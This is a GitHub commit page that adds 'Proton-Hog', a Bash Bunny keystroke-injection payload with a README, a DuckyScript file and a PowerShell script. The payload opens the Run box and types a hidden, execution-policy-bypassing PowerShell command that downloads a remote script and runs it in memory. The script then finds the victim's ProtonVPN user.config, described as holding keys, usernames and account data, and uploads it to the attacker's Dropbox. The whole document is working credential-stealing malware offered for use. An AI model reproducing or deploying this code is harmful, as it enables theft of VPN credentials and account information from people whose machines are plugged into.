Skip to content
This repository was archived by the owner on Jan 5, 2025. It is now read-only.

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
atomiczsec authored Dec 5, 2022
1 parent c310925 commit 81b3dab
Show file tree
Hide file tree
Showing 3 changed files with 165 additions and 0 deletions.
108 changes: 108 additions & 0 deletions BashBunny/payloads/Proton-Hog/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,108 @@
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Proton+Hog!+😈&center=true&size=30">
</a>
</h1>

<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>

# Proton-Hog

A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.

## Description

This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file

Then dropbox will be used to exfiltrate the files to cloud storage

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

<p align="right">(<a href="#top">back to top</a>)</p>

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

<p align="right">(<a href="#top">back to top</a>)</p>

## Contributing

All contributors names will be listed here

atomiczsec

I am Jakoby

<p align="right">(<a href="#top">back to top</a>)</p>

## Version History

* 0.1
* Initial Release

<p align="right">(<a href="#top">back to top</a>)</p>

<!-- CONTACT -->
## Contact

<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>

<p align="right">(<a href="#top">back to top</a>)</p>




<p align="right">(<a href="#top">back to top</a>)</p>

<!-- ACKNOWLEDGMENTS -->
## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

<p align="right">(<a href="#top">back to top</a>)</p>
16 changes: 16 additions & 0 deletions BashBunny/payloads/Proton-Hog/payload.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
REM Title: Proton-Hog

REM Author: atomiczsec

REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.

REM Target: Windows 10

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER

REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
41 changes: 41 additions & 0 deletions BashBunny/payloads/Proton-Hog/s.ps1
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
function DropBox-Upload {

[CmdletBinding()]
param (

[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}

# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored

if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) {
try {
Write-Host "The VPN folder has not been found. "
}
catch {
throw $_.Exception.Message
}
}

else {
$protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN"
cd $protonVpnPath
Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd
Get-ChildItem | cd

# Upload user.config to dropbox
DropBox-Upload -f "user.config"
}

0 comments on commit 81b3dab

Please sign in to comment.